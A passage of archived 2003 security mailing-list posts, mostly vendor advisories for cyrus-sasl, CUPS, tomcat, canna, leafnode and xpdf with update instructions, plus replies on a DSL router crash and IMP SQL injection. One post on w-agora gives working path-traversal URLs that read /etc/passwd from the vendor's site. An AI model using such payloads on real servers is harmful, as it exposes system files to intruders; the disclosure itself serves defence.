8.1/SRPMS/kdepim-2.2.1-1.1mdk.src.rpm 72bb785fbe96b4ef4fdb39bee1053eda 8.1/SRPMS/kdesdk-2.2.1-1.1mdk.src.rpm 0d9dee6b9c70263f1d1130782dcf2c4f 8.1/SRPMS/kdeutils-2.2.1-2.1mdk.src.rpm Mandrake Linux 8.1/IA64: 93000191f3b2986a1949460ae8ede1ab ia64/8.1/RPMS/arts-2.2.1-6.2mdk.ia64.rpm ed8221d6d69b98742a536cefa078edb5 ia64/8.1/RPMS/kdebase-2.2.1-7.1mdk.ia64.rpm 988d5de4aa
[RHSA-2002:283-09] Updated cyrus-sasl packages fix buffer overflows
- Red Hat, Inc. Red Hat Security Advisory Synopsis: Updated cyrus-sasl packages fix buffer overflows Advisory ID: RHSA-2002:283-09 Issue date:2003-01-07 Updated on:2003-01-06 Product: Red Hat Linux Keywords: cyrus-sasl buffer overflow flaw:buf Cross references: Obsoletes: RHSA-2001:150 CVE Names: CAN-2002-1347 - 1. Topic: Updated cyrus-sasl packages are now available for Red Hat Linux 8.0. These packages close buffer overflows present in Cyrus SASL 2.1 and later. 2. Relevant releases/architectures: Red Hat Linux 8.0 - i386 3. Problem description: Cyrus SASL is an implementation of the Simple Authentication and Security Layer, a method for adding authentication support to connection-based protocols. Cyrus SASL versions 2 prior to 2.1.10 include a number of buffer overflow vulnerabilities: Insufficient buffer length checking in user name canonicalization. This issue would be hard to exploit, but would allow a remote user to execute arbitrary code on the system. When performing authentication using LDAP, saslauthd does not allocate enough memory when it needs to escape special characters in the username and realm. This issue may be easy to remotely exploit. The Log writer might not have allocated memory for the trailing \0 in a message. This issue is probably hard to exploit, although it is possible to affect the logging data with at least anonymous authentication. All users of Cyrus-SASL on Red Hat Linux 8.0 are advised to upgrade to the erratum packages containing Cyrus SASL version 2.1.10 which is not affected by these vulnerabilities. Other Red Hat Linux releases are not affected by this vulnerability as they included Cyrus-SASL version 1.5.x. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via Red Hat Network. Many people find this an easier way to apply updates. To use Red Hat Network, launch the Red Hat Update Agent with the following command: up2date This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. 5. RPMs required: Red Hat Linux 8.0: SRPMS: ftp://updates.redhat.com/8.0/en/os/SRPMS/cyrus-sasl-2.1.10-1.src.rpm i386: ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-2.1.10-1.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-devel-2.1.10-1.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-gssapi-2.1.10-1.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-md5-2.1.10-1.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-plain-2.1.10-1.i386.rpm 6. Verification: MD5 sum Package Name -- e291b7bd71cd69825077aba5a3341764 8.0/en/os/SRPMS/cyrus-sasl-2.1.10-1.src.rpm 0bf0d5b2e17a26e06f1b9e2cd02fdae3 8.0/en/os/i386/cyrus-sasl-2.1.10-1.i386.rpm 80d77339fc5a06bed5073cd34019d9f4 8.0/en/os/i386/cyrus-sasl-devel-2.1.10-1.i386.rpm 877a229ffe46aa7be012f8d69fa1d544 8.0/en/os/i386/cyrus-sasl-gssapi-2.1.10-1.i386.rpm 8568b99569bceb11d237fd302d372113 8.0/en/os/i386/cyrus-sasl-md5-2.1.10-1.i386.rpm bc69bfc361c0c75c15be0d7557133633 8.0/en/os/i386/cyrus-sasl-plain-2.1.10-1.i386.rpm These packages are GPG signed by Red Hat, Inc. for security. Our key is available at http://www.redhat.com/about/contact/pgpkey.html You can verify each package with the following command: rpm --checksig -v If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: md5sum 7. References: http://marc.theaimsgroup.com/?l=cyrus-sasl&m=103945455024946 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1347 8. Contact: The Red Hat security contact is <[EMAIL PROTECTED]>. More contact details at http://www.redhat.com/solutions/security/news/contact.html Copyright(c) 2000, 2001, 2002 Red Hat, Inc.
[RHSA-2002:295-07] Updated CUPS packages fix various vulnerabilities
- Red Hat, Inc. Red Hat Security Advisory Synopsis: Updated CUPS packages fix various vulnerabilities Advisory ID: RHSA-2002:295-07 Issue date:2003-01-13 Updated on:2003-01-09 Product: Red Hat Linux Keywords: Cross references: Obsoletes: CVE Names: CAN-2002-1366 CAN-2002-1367 CAN-2002-1368 CAN-2002-1369 CAN-2002-1371 CAN-2002-1372 CAN-2002-1383 - 1. Topic: Updated CUPS packages are available for Red Hat Linux 7.3 and 8.0 which fix various security issues. 2. Relevant releases/architectures: Red Hat Linux 7.3 - i386 Red Hat Linux 8.0 - i386 3. Problem description: The Common UNIX Printing System (CUPS) provides a portable printing layer. A number of vulnerabilities have been discovered in CUPS. CUPS was distributed with Red Hat Linux 7.3 and 8.0 but is not installed by default. 1. An integer overflow exists in the CUPS HTTP interface that allows a local attacker to gain the permissions of the 'lp' user. (CAN-2002-1383) 2. A race condition exists in the creation of a pid file which allows an attacker who already has privileges of the 'lp' user (for example from utilizing a different exploit) to create or overwrite any file as root, leading to arbitrary code execution. (CAN-2002-1366) 3. It is possible to remotely add a printer to CUPS by sending a specially crafted UDP packet. If an attacker utilizes this vulnerability, they could add a printer with a tainted name that if clicked on in the web administration interface could be used to exploit other vulnerabilities. (CAN-2002-1367) By utilizing this vulnerability, an attacker could take a number of steps to be able to get hold of the certificate used to access the administrative section of the CUPS server and potentially add a printer that will execute commands with root privileges. 4. Problems with chunked encoding and negative content length handling in the CUPS HTTP interface can cause CUPS to crash. On Red Hat Linux platforms this can cause a denial of service (DoS) against CUPS. (CAN-2002-1368) 5. A number of integer overflows exist in the image handling code of the filters in CUPS. In addition, CUPS does not properly check for zero width GIF images. These vulnerabilities allow an attacker who has the ability to print to run arbitrary code as the 'lp' user. (CAN-2002-1371) 6. An integer overflow exists in the CUPS pdftops filter. This can be exploited by an attacker who is able to print sending a carefully crafted PDF file which can execute arbitrary commands as the 'lp' user. (CAN-2002-1384) 7. A buffer overflow exists in setting up the job management options. When combined with other vulnerabilities, this could allow a local user to gain root privileges. This issue only affects the version of CUPS shipped with Red Hat Linux 7.3. (CAN-2002-1369) 8. A bug in the select() call would allow an easy DoS attack which would cause CUPS to not recover once the DoS has stopped. (CAN-2002-1372) Red Hat Linux 7.3 and 8.0 were shipped with versions of CUPS that are vulnerable to these issues. All users of CUPS are advised to upgrade to the erratum packages which contain a patch to correct these issue. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via Red Hat Network. Many people find this an easier way to apply updates. To use Red Hat Network, launch the Red Hat Update Agent with the following command: up2date This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. 5. RPMs required: Red Hat Linux 7.3: SRPMS: ftp://updates.redhat.com/7.3/en/os/SRPMS/cups-1.1.14-15.2.src.rpm i386: ftp://updates.redhat.com/7.3/en/os/i386/cups-1.1.14-15.2.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/cups-devel-1.1.14-15.2.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/cups-libs-1.1.14-15.2.i386.rpm Red Hat Linux 8.0: SRPMS: ftp://updates.redhat.com/8.0/en/os/SRPMS/cups-1.1.17-0.2.src.rpm i386: ftp://updates.redhat.com/8.0/en/os/i386/cups-1.1.17-0.2.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/cups-devel-1.1.17-0.2.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/cups-libs-1.1.17-0.2.i386.rpm 6. Verification: MD5 sum Package Name -- cf0832f7db07adf
[SECURITY] [DSA 225-1] New tomcat packages fix source disclosure vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 225-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze January 9th, 2002 http://www.debian.org/security/faq - -- Package: tomcat4 Vulnerability : source disclosure Problem-Type : remote Debian-specific: no CVE Id : CAN-2002-1394 A security vulnerability has been confirmed to exist in Apache Tomcat 4.0.x releases, which allows to use a specially crafted URL to return the unprocessed source of a JSP page, or, under special circumstances, a static resource which would otherwise have been protected by a security constraint, without the need for being properly authenticated. This is based on a variant of the exploit that was identified as CAN-2002-1148. For the current stable distribution (woody) this problem has been fixed in version 4.0.3-3woody2. The old stable distribution (potato) does not contain tomcat packages. For the unstable distribution (sid) this problem does not exist in the current version 4.1.16-1. We recommend that you upgrade your tomcat packages. Installation Instructions - - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody2.dsc Size/MD5 checksum: 708 0911f7c03a0ab71133fbe95bf45d0d20 http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody2.diff.gz Size/MD5 checksum:15881 de9f6f0fb39374bfe4ece1ef4824d942 http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3.orig.tar.gz Size/MD5 checksum: 1588186 2b2e0d859f7152e5225633933e6585d6 Architecture independent components: http://security.debian.org/pool/updates/contrib/t/tomcat4/libtomcat4-java_4.0.3-3woody2_all.deb Size/MD5 checksum: 1134258 680c67daebdd36eb879ce593e6362f3b http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4-webapps_4.0.3-3woody2_all.deb Size/MD5 checksum: 1167502 34f71826d8441f967e3da0ee4ab9a1be http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody2_all.deb Size/MD5 checksum: 126444 e7dbc07086a7e349474bff877342cb6d These files will probably be moved into the stable distribution on its next revision. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+HYzeW5ql+IAeqTIRAsF7AJwOJotOb7a4N02/Pk/J6dibAj6bagCbB7lY zdY2WnKneQ1GPGV7ZMkutNk= =mkx7 -END PGP SIGNATURE-
Re: Efficient Networks 5861 DSL Router
On Fri, 10 Jan 2003 11:05:01 -, "Greg Bolshaw" <[EMAIL PROTECTED]> wrote: >Product: Efficient Networks 5861 DSL Router > http://www.efficient.com/ebz/5800.html >Tested version:5.3.80 (Latest firmware) >Advisory date: 10/01/2003 >Severity: Moderate > >Background > [...] > >As far as I am aware, the 5861 is the standard router provided to all ADSL >business customers in the UK. From which provider? > >Details > >When using the builtin IP filtering to block incoming TCP SYN flags, a >simple portscan to the WAN interface of the router will cause the it to lock >up, and eventually restart. I have confirmed this using the Sygate port scanner found at http://scan.sygate.com. [...] >Solution > >There is currently no fix for this exploit. I have contacted Efficient >Networks to inform them of the problem. A workarround is to disable the filtering on the router and make sure all unsolicited packets are forwarded to a machine with a capable firewall installed. This is what I am doing in one instance. Andrew. -- Andrew Hodgson, Bromyard, Herefordshire, UK. Email: [EMAIL PROTECTED]
Re: Opentype font file causes Windows to restart.
I suppose that IE's 'automatic font download' support (which is on by default) would exacerbate this problem, correct? --dil
Request for assistance: trying to find Zardoz Security Digest Files
I am the owner of a project designed to preserve computer security digests and I need to ask the community for help locating material relating to the Zardoz Security Digest. Without this material, I am not able to comprehensively document the history of this digest. In particular, I am unable to locate the following (circa. 1990 - 1991): Volume 1, Issues 1, 5, 9, 22, 23, 26, 28 and 44+ (if they exist) Volume 2, Issues 6, 14, and 16+ (if they exist) Volume 3, Issues 5, 6, 8, 9, 10, 14 and 16+ (if they exist) I am willing to fund shipping / conversion of old media if necessary. If you can help, please do. This project, while small, has generated interest so far, and will over time represent and important archive of material. This is my appeal to you. If you would like to visit work in progress, please do at http://securitydigest.org/, and in particular the recent documentation of the Unix Security Mailing List at http://securitydigest.org/unix/ which has been previously announced to this forum. Alan. -- Curator of "The `Security Digest` Archives" [EMAIL PROTECTED] http://securitydigest.org
[SECURITY] [DSA 224-1] New canna packages fix buffer overflow and denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 224-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze January 8th, 2002 http://www.debian.org/security/faq - -- Package: canna Vulnerability : buffer overflow and more Problem-Type : local, remote Debian-specific: no CVE Id : CAN-2002-1158 CAN-2002-1159 BugTraq Id : 6351 6354 Several vulnerabilities have been discovered in canna, a Japanese input system. The Common Vulnerabilities and Exposures (CVE) project identified the following vulnerabilities: * CAN-2002-1158 (BugTraq Id 6351): "hsj" of Shadow Penguin Security discovered a heap overflow vulnerability in the irw_through function in canna server. * CAN-2002-1159 (BugTraq Id 6354): Shinra Aida of the Canna project discovered that canna does not properly validate requests, which allows remote attackers to cause a denial of service or information leak. For the current stable distribution (woody) these problems have been fixed in version 3.5b2-46.2. For the old stable distribution (potato) these problems have been fixed in version 3.5b2-25.2. For the unstable distribution (sid) these problems have been fixed in version 3.6p1-1. We recommend that you upgrade your canna packages. Installation Instructions - - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 2.2 alias potato - - Source archives: http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2.dsc Size/MD5 checksum: 621 3eefe4cadee26f2e74c148836428d6b1 http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2.diff.gz Size/MD5 checksum: 131811 63bb6ebf66965b21fd2d80107f720dad http://ftp.debian.org/debian/dists/potato/main/source/utils/canna_3.5b2.orig.tar.gz Size/MD5 checksum: 1328622 5e1d8527d397c3914ce6104dac3db466 Alpha architecture: http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2_alpha.deb Size/MD5 checksum: 901812 a4b31bcbfc19c9ce1ee5575595399301 http://security.debian.org/pool/updates/main/c/canna/canna-utils_3.5b2-25.2_alpha.deb Size/MD5 checksum: 119214 74679fa94fd305f40bb396dc993ba780 http://security.debian.org/pool/updates/main/c/canna/libcanna1g_3.5b2-25.2_alpha.deb Size/MD5 checksum: 478650 1e2d41c1ebca00e898652dcf720492a3 http://security.debian.org/pool/updates/main/c/canna/libcanna1g-dev_3.5b2-25.2_alpha.deb Size/MD5 checksum: 701894 a402fb38f84c3315e71efc468c009324 ARM architecture: http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2_arm.deb Size/MD5 checksum: 839926 6b88eb89835706fa151d393dadbedd1a http://security.debian.org/pool/updates/main/c/canna/canna-utils_3.5b2-25.2_arm.deb Size/MD5 checksum: 107114 21b9623c1d662b2d23017634ebcb69dc http://security.debian.org/pool/updates/main/c/canna/libcanna1g_3.5b2-25.2_arm.deb Size/MD5 checksum: 409604 01e0b806a238fdf417d6892ab929b1d5 http://security.debian.org/pool/updates/main/c/canna/libcanna1g-dev_3.5b2-25.2_arm.deb Size/MD5 checksum: 593312 f04a0c824bed79d0e5ea6ee13a9ee838 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2_i386.deb Size/MD5 checksum: 831452 79ede5024732deae7a3f106ca94d1d65 http://security.debian.org/pool/updates/main/c/canna/canna-utils_3.5b2-25.2_i386.deb Size/MD5 checksum: 104902 5e7805af7d37cb33729cb4dac9eba20b http://security.debian.org/pool/updates/main/c/canna/libcanna1g_3.5b2-25.2_i386.deb Size/MD5 checksum: 378598 6caec31ea8eb30886c67ea6b6b7f1de2 http://security.debian.org/pool/updates/main/c/canna/libcanna1g-dev_3.5b2-25.2_i386.deb Size/MD5 checksum: 524486 e1a321f6b721c3558d01c30bb7853ed0 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2_m68k.deb Size/MD5 checksum: 822694 eb6ffca2442a0e349d75442c39b60058 http://security.debian.org/pool/updates/main/c/canna/canna-utils_3.5b2-25.2_m68k.deb Size/MD5 checksum: 103996 569c48f8230b8a32e1566abbe8119a97 http://security.debian.org/pool/updates/main/c/canna/libcanna1g_3.5b2-25.2_m68k.deb Size/MD5 checksum: 372478 c70244a70b11a0a12469e73a5d45700a http://security.debian.org/pool/update
MDKSA-2003:005 - Updated leafnode packages fix remote DoS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: leafnode Advisory ID:MDKSA-2003:005 Date: January 14th, 2003 Affected versions: 8.2, 9.0 Problem Description: A vulnerability was discovered by Jan Knutar in leafnode that Mark Brown pointed out could be used in a Denial of Service attack. This vulnerability causes leafnode to go into an infinite loop with 100% CPU use when an article that has been crossposed to several groups, one of which is the prefix of another, is requested by it's Message-ID. This vulnerability was introduced in 1.9.20 and fixed upstream in version 1.9.30. Only Mandrake Linux 9.0 is affected by this, but version 1.9.19 (which shipped with Mandrake Linux 8.2) is receiving an update due to critical bugs in it that can corrupt parts of its news spool under certain circumstances. References: http://marc.theaimsgroup.com/?l=bugtraq&m=104127108823436&w=2 Updated Packages: Mandrake Linux 8.2: a9c3f6f4198c88e71f7c78281d6ead7b 8.2/RPMS/leafnode-1.9.31-1.1mdk.i586.rpm 25f0be374ababf45db444a9b64ab1a98 8.2/SRPMS/leafnode-1.9.31-1.1mdk.src.rpm Mandrake Linux 8.2/PPC: c39ab8855cbb4d0727c796242edda60c ppc/8.2/RPMS/leafnode-1.9.31-1.1mdk.ppc.rpm 25f0be374ababf45db444a9b64ab1a98 ppc/8.2/SRPMS/leafnode-1.9.31-1.1mdk.src.rpm Mandrake Linux 9.0: 4749ee927caa55f15adddadd473a3d12 9.0/RPMS/leafnode-1.9.31-1.1mdk.i586.rpm 25f0be374ababf45db444a9b64ab1a98 9.0/SRPMS/leafnode-1.9.31-1.1mdk.src.rpm Bug IDs fixed (see https://qa.mandrakesoft.com for more information): To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you. If you want to upgrade manually, download the updated package from one of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm". A list of FTP mirrors can be obtained from: http://www.mandrakesecure.net/en/ftp.php Please verify the update prior to upgrading to ensure the integrity of the downloaded package. You can do this with the command: rpm --checksig All packages are signed by MandrakeSoft for security. You can obtain the GPG public key of the Mandrake Linux Security Team from: https://www.mandrakesecure.net/RPM-GPG-KEYS Please be aware that sometimes it takes the mirrors a few hours to update. You can view other update advisories for Mandrake Linux at: http://www.mandrakesecure.net/en/advisories/ MandrakeSoft has several security-related mailing list services that anyone can subscribe to. Information on these lists can be obtained by visiting: http://www.mandrakesecure.net/en/mlist.php If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team - -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.7 (GNU/Linux) mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 WKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo P0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl hynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx PFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg 2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs iyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD LLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu ZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t PohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy /NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA BgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP WdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w Pk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA BgUCPI+UAwAKCRDniYrgcHcf8xK5AKCm/Mq8qP8GE0o1hEX22QsJMZwH5gCfZ72H 8TacOb3oAmBdprf+K6gkdOiIRgQQEQIABgUCOtOieAAKCRCv2bZyU0yB80MeAJ9K +jXt0cKuaUonRU+CRGetk6t9dgCfTRRL6/puOKdD6md70+K5EBBSvsG0OE1hbmRy YWtlIExpbnV4IFNlY3VyaXR5IFRlYW0gPHNlY3VyaXR5QG1hbmRyYWtlc29mdC5j b20+iFcEExECABcFAjyPnuUFCwcKAwQDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmFi+ AJsHhohgnU3ik4+gy3EdFlB2i/MBoACg6lHn5cnVvTcmgNccWxeNxLLZI5e5AQ0E OWnn7xAEAOQlTVY4TiNo5V/iP0J1xnqjqlqZsU7yEBKo/gZz6/+hx75RURe1ebiJ 9F779FQbpJ9Epz1KLSXvq974rnVb813zuGdmgFyk+ryA/rTR2RQ8h+EoNkwmATzR xBXVJb57fFQj
MDKSA-2003:002 - Updated xpdf packages fix integer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: xpdf Advisory ID:MDKSA-2003:002 Date: January 9th, 2003 Affected versions: 7.2, 8.0, 8.1, 8.2, 9.0 Problem Description: The pdftops filter found in both the xpdf and CUPS packages suffers from an integer overflow that can be exploited to gain the privilege of the victim user. References: http://www.idefense.com/advisory/12.23.02.txt Updated Packages: Linux-Mandrake 7.2: 78e3809401a324ba6c95f07c723565a9 7.2/RPMS/xpdf-1.01-4.2mdk.i586.rpm 369eb053232cab228db800582ac45700 7.2/SRPMS/xpdf-1.01-4.2mdk.src.rpm Mandrake Linux 8.0: e6483cb19bdd5ea5c54aa4c8a8245ad2 8.0/RPMS/xpdf-1.01-4.1mdk.i586.rpm 398a6e6e9240c9a8a31f44d55703fa93 8.0/SRPMS/xpdf-1.01-4.1mdk.src.rpm Mandrake Linux 8.0/PPC: 8e45ed607184f92df7ba11d8eeaefe1e ppc/8.0/RPMS/xpdf-1.01-4.1mdk.ppc.rpm 398a6e6e9240c9a8a31f44d55703fa93 ppc/8.0/SRPMS/xpdf-1.01-4.1mdk.src.rpm Mandrake Linux 8.1: ff859e43804e7c4df40cde357daa80d8 8.1/RPMS/xpdf-1.01-4.1mdk.i586.rpm 398a6e6e9240c9a8a31f44d55703fa93 8.1/SRPMS/xpdf-1.01-4.1mdk.src.rpm Mandrake Linux 8.1/IA64: efc7af1c1cf81ad4ab323e39fd012b21 ia64/8.1/RPMS/xpdf-1.01-4.1mdk.ia64.rpm 398a6e6e9240c9a8a31f44d55703fa93 ia64/8.1/SRPMS/xpdf-1.01-4.1mdk.src.rpm Mandrake Linux 8.2: 682bd75ce5f02a5b487d8f5fc65d4a91 8.2/RPMS/xpdf-1.01-4.1mdk.i586.rpm 398a6e6e9240c9a8a31f44d55703fa93 8.2/SRPMS/xpdf-1.01-4.1mdk.src.rpm Mandrake Linux 8.2/PPC: ee689d1322befa34df37ca265ea03318 ppc/8.2/RPMS/xpdf-1.01-4.1mdk.ppc.rpm 398a6e6e9240c9a8a31f44d55703fa93 ppc/8.2/SRPMS/xpdf-1.01-4.1mdk.src.rpm Mandrake Linux 9.0: 61713e31f42b21c9c05f36affdc320a8 9.0/RPMS/xpdf-1.01-4.1mdk.i586.rpm 398a6e6e9240c9a8a31f44d55703fa93 9.0/SRPMS/xpdf-1.01-4.1mdk.src.rpm Bug IDs fixed (see https://qa.mandrakesoft.com for more information): To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you. If you want to upgrade manually, download the updated package from one of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm". A list of FTP mirrors can be obtained from: http://www.mandrakesecure.net/en/ftp.php Please verify the update prior to upgrading to ensure the integrity of the downloaded package. You can do this with the command: rpm --checksig All packages are signed by MandrakeSoft for security. You can obtain the GPG public key of the Mandrake Linux Security Team from: https://www.mandrakesecure.net/RPM-GPG-KEYS Please be aware that sometimes it takes the mirrors a few hours to update. You can view other update advisories for Mandrake Linux at: http://www.mandrakesecure.net/en/advisories/ MandrakeSoft has several security-related mailing list services that anyone can subscribe to. Information on these lists can be obtained by visiting: http://www.mandrakesecure.net/en/mlist.php If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team - -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.7 (GNU/Linux) mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 WKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo P0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl hynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx PFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg 2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs iyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD LLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu ZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t PohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy /NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA BgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP WdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w Pk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA BgUCPI+UAwAKCRDniYrgcHcf8xK5AKCm/Mq8qP8GE0o1hEX22QsJMZwH5gCfZ72H 8TacOb3oAmBdprf+K6gkdOiIRgQQEQIABgUCOtOieAAKCRCv2bZyU0yB80MeAJ9K +jXt0cKuaUonRU+CRGetk6t9dgCfTRRL6/puOKdD6md70+K5EBBSvsG0OE1hbmRy YWtlIExpbnV4IFNlY3VyaXR5IFRlYW0gPHNlY3VyaXR5QG1
Bug in w-agora
=== ==Shell Security Team== === == Advisory For W-agora== == - Product : w-agora - Tested version : version 4.1.5 - Website : http://www.w-agora.net - Discovery By Sonyy - Vendor Status: informed - Problem : A security vulnerability in W-agora The bug : == index.php if (empty($bn)) { # No forum selected -> default to 'site' configuration $site = empty($site) ? "agora" : $site; $cfg_file = "${cfg_dir}/site_${site}.${ext}"; $expnd = "all"; } else { $cfg_file = "${cfg_dir}/${bn}.${ext}"; } Exploit : = index.php http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 And modules.php http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 Any Question : == Sonyy --> [EMAIL PROTECTED]
Re: IMP 2.x SQL injection vulnerabilities
On Wed, 8 Jan 2003, Jouko Pynnonen informed us that: > The vendor has been informed about this bug last month. Although there > hasn't been any direct reply, there was a comment on this on the IMP > mailing list: "2.2.x is officially deprecated/unsupported. This does not > apply to 3.x.". > > Versions up to and including 2.2.8 seem vulnerable. According to the > author, version 3 isn't affected so upgrading to IMP 3 is recommended. > This, and more information about IMP is available at http://horde.org/imp/. What many software developpers (including, but apparently not limitted to, many commercial software vendors) seem to fail to realize is that some sites use their applications in production environments, with (in my case tens of thousands of) real users and upgrading to the latest version which includes numerous changes above and beyond the fix for the reported bug is often difficult in the best of cases. In the case of Imp-2 -> Imp-3, the changes are much too significant for some of us to simply switch versions and 